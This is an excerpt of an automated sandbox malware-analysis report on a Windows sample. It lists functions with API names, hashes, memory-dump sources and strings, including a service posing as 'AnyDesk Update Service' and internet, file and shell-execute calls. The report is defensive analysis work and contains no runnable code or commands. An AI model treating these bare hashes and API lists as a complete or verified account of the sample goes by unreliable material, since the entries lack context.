                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3328510275-0
                                                                                                      • Opcode ID: 0569d1ce216643eab5a4f3de0e57884fb0549fe14321f9cc615d00747ef2c50b
                                                                                                      • Instruction ID: ab8548da86cf6ce796ff99fc2ba2fa4b2d80b06af35a6ec71dee67199d6fe7e7
                                                                                                      • Opcode Fuzzy Hash: 0569d1ce216643eab5a4f3de0e57884fb0549fe14321f9cc615d00747ef2c50b
                                                                                                      • Instruction Fuzzy Hash: 7101C812F0B75281EA209F1574100296B60EF54FE1F5C4235DFEE537CADE6CE4428340
                                                                                                      Function 00007FF6C787CD38 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 918212764-0
                                                                                                      • Opcode ID: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction ID: ee7b2eeb089b5b864adae189946ef55c09126606c23b4ed3feb2298231836f48
                                                                                                      • Opcode Fuzzy Hash: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction Fuzzy Hash: 2821A111F0E68241FF909F61A49427D1ED5AF85BA6F494235EBAFC73D5DE6CA4408300
                                                                                                      Function 00007FF6C7889D9C Relevance: 1.7, APIs: 1, Instructions: 181processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction ID: 4b23c002a3218172db4174593b6a53be96ea36f36faa04f36c2aea544d04ad7a
                                                                                                      • Opcode Fuzzy Hash: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction Fuzzy Hash: BF818036B097C18AE7608F65E4800AE7FA4F784B99F144136EFD857BA9DF38D4858700
                                                                                                      Function 00007FF6C786D275 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction ID: 02058e954a1f6aec4b09f54f34e50f1804f6afab3ebdd7b0c42a83f36acad948
                                                                                                      • Opcode Fuzzy Hash: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction Fuzzy Hash: EE219F32A16B0599EB248F64D4822EC3BA0FB05719F040636D79D87BD5DF38E645C754
                                                                                                      Function 00007FF6C788A608 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d828b0d5652c2d04ac676ba8046156f360f4c386c5efaa2d7327842d9c67eb8d
                                                                                                      • Instruction ID: 75912682b8eabb102446c1c9a79c66c993c3f5a6ca3e00d5722bbf1a55ce03b3
                                                                                                      • Opcode Fuzzy Hash: d828b0d5652c2d04ac676ba8046156f360f4c386c5efaa2d7327842d9c67eb8d
                                                                                                      • Instruction Fuzzy Hash: FB21C632A09B4287DB61CF18D4403797AA1FB84B55F544235E7AEC76D9DF3CD8018B00
                                                                                                      Function 00007FF6C7875868 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: a17d875b9342dfe3ed9dbf28369d4997790f73aba12d6fa00d5f6f8d2ccfcf94
                                                                                                      • Instruction ID: 7a93e76170cbacb7a28c2215b1feb777f0e9d58296821fbc4e14f020c5c99532
                                                                                                      • Opcode Fuzzy Hash: a17d875b9342dfe3ed9dbf28369d4997790f73aba12d6fa00d5f6f8d2ccfcf94
                                                                                                      • Instruction Fuzzy Hash: 58117C22B1E68182FF619F51D40037AAA90AF85B81F544535FBCECBAC6DE6CEA008740
                                                                                                      Function 00007FF6C7867CF0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6C7867D04
                                                                                                        • Part of subcall function 00007FF6C78698F0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6C78698F8
                                                                                                        • Part of subcall function 00007FF6C78698F0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6C78698FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1208906642-0
                                                                                                      • Opcode ID: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction ID: 667ff7f425e63be3a27244c2e8b78f3a2e99c2e793db579727c9b485b7411455
                                                                                                      • Opcode Fuzzy Hash: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction Fuzzy Hash: 84E0B650D6F243A4FE553F3515463B80E405F21347E502879DBEEC21CBDE0E234625A2

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF6C78586D0 Relevance: 55.5, APIs: 20, Strings: 10, Instructions: 2982synchronizationnetworksleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$CloseHandle$std::_$AttributesLockitObjectSingleWait$ErrorExecuteLastShell$Lockit::_Lockit::~_OpenRead_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateFacet_MoveRegisterSleepWrite
                                                                                                      • String ID: #*1*$4h>h$7h*h$;*V*$@$Qh7h$R*=*$XhYh$kh(h$p
                                                                                                      • API String ID: 3970674913-2482468732
                                                                                                      • Opcode ID: 077562850e548e5ee04dcf2a8a59179b575a7ea7ddc821b45c83099a5fb45278
                                                                                                      • Instruction ID: f61cd41803f750f0dae6ae02fc5508b62b519ca1592e5acb99ccc0e562c0cc67
                                                                                                      • Opcode Fuzzy Hash: 077562850e548e5ee04dcf2a8a59179b575a7ea7ddc821b45c83099a5fb45278
                                                                                                      • Instruction Fuzzy Hash: D7832A2691A2C299E330AF71D8413F93760FF6870AF405036E788CBAA9EF3D5645D719
                                                                                                      Function 00007FF6C7857A20 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 627serviceregistrythreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Service_invalid_parameter_noinfo_noreturn$ErrorLastStatus$CloseCreateHandle$CtrlEventFileHandlerManagerModuleNameOpenRegisterThread
                                                                                                      • String ID: %s$%s (%d)$%s (%d)$%s (%d)$AnyDesk Update Service$AnyDeskUpdateService$AnyDeskUpdateService$pslk
                                                                                                      • API String ID: 2335625088-53298800
                                                                                                      • Opcode ID: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction ID: 21e0ed18f6b58ce876b982654bbd16cc4bc757597f8c22ff2b57b806755dd754
                                                                                                      • Opcode Fuzzy Hash: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction Fuzzy Hash: 7862C222E196828AF700CF78E4042AD3BA1FF59799F505236EB9996AA5EF3CD145C700
                                                                                                      Function 00007FF6C7888348 Relevance: 18.7, APIs: 6, Strings: 4, Instructions: 1226COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$fegetenv
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 1709182501-2761157908
                                                                                                      • Opcode ID: b59e69f4204536450ccd6fa78c03395ee9f6d53d672f6eba5bc1b9b1de87101d
                                                                                                      • Instruction ID: ac59b56aeab79057291616a362656cfe4516c9a94120deb46e2429475410272c
                                                                                                      • Opcode Fuzzy Hash: b59e69f4204536450ccd6fa78c03395ee9f6d53d672f6eba5bc1b9b1de87101d
                                                                                                      • Instruction Fuzzy Hash: 1AB2C472A2A2828BE764CF65D4407FD3BA1FB54389F945136DB5ED7A84DF38A900CB40
                                                                                                      Function 00007FF6C7862860 Relevance: 13.0, APIs: 6, Strings: 1, Instructions: 705COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 4131450254-3924258884
                                                                                                      • Opcode ID: d216165668479aeebd92cfd32e0e0fa09fef93c486884d47427c151aa33764a7
                                                                                                      • Instruction ID: cfa7d470c144509ca351d1f668c54d2756436a91095b03ee0f70ce4dc031f2d0
                                                                                                      • Opcode Fuzzy Hash: d216165668479aeebd92cfd32e0e0fa09fef93c486884d47427c151aa33764a7
                                                                                                      • Instruction Fuzzy Hash: 7D62BB22B2AA8696EB118F29D4402AD7BA1FB48F85F548131EF9DD3BA4DF3CD545C300
                                                                                                      Function 00007FF6C7886ED0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                      • String ID: utf8
                                                                                                      • API String ID: 3069159798-905460609
                                                                                                      • Opcode ID: 23966cb477daef38ef586ca10e469e6a55aaaa8553c2ec0c99e1010b04e3dac5
                                                                                                      • Instruction ID: 92aae95399ab042b2896f8bdab533841d7f5d427d9c71ac96986994c39e20317
                                                                                                      • Opcode Fuzzy Hash: 23966cb477daef38ef586ca10e469e6a55aaaa8553c2ec0c99e1010b04e3dac5
                                                                                                      • Instruction Fuzzy Hash: AE919C36B0A74286EB249F61D8406B92BA5EF44B82F448132DB9D877CADF3DE951C340
                                                                                                      Function 00007FF6C788792C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2591520935-0
                                                                                                      • Opcode ID: a02af41d092f35fb43f6f467199965a4c9166f1d5bb537038a4f83c2451e3280
                                                                                                      • Instruction ID: 03e0f7d210a02de0bf3d9ba94d65da3b62d8c7fd8bdf1cc52feae930257cf04e
                                                                                                      • Opcode Fuzzy Hash: a02af41d092f35fb43f6f467199965a4c9166f1d5bb537038a4f83c2451e3280
                                                                                                      • Instruction Fuzzy Hash: D7716822B1A64289FF219FB1D8506BC2BB0BF48B86F444136CB9D97795EF3CA545C350
                                                                                                      Function 00007FF6C7868430 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 5e37717cb04637ae486a186e1833263bf3eb9ee7c24be1d440358644591693ee
                                                                                                      • Instruction ID: 4916dd0bcf32fe4d61ca178bb6a216d91f275527ed0d33508fe4ec6c91d38c4f
                                                                                                      • Opcode Fuzzy Hash: 5e37717cb04637ae486a186e1833263bf3eb9ee7c24be1d440358644591693ee
                                                                                                      • Instruction Fuzzy Hash: B8313D72619B819AEB608F61E8503ED6774FB44705F40443ADB8D87B95EF38D648C710
                                                                                                      Function 00007FF6C787478C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction ID: 8d8d3872ecde1a0491cca07b99644f05774afebeed70d2a705520d13402052b7
                                                                                                      • Opcode Fuzzy Hash: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction Fuzzy Hash: D1316D32619F8196DB60CF25E8402AE77A4FB89795F500136EBDD83B95EF3CD5458B00
                                                                                                      Function 00007FF6C78832B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: fbba52b1468ed587477220f350bb15cea76bb5262a21c8ee64979a1f66350291
                                                                                                      • Instruction ID: 5e03e42fd204e4162ddeea5d89cc99cf06772d7bc685ca46b88977a44c113be7
                                                                                                      • Opcode Fuzzy Hash: fbba52b1468ed587477220f350bb15cea76bb5262a21c8ee64979a1f66350291
                                                                                                      • Instruction Fuzzy Hash: 37B1B022B1A69241EA61DF26E9041BD6B91EB54BE6F444232EF9EC7F85DF3CE441C300
                                                                                                      Function 00007FF6C7860190 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 506COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: %$+
                                                                                                      • API String ID: 3668304517-2626897407
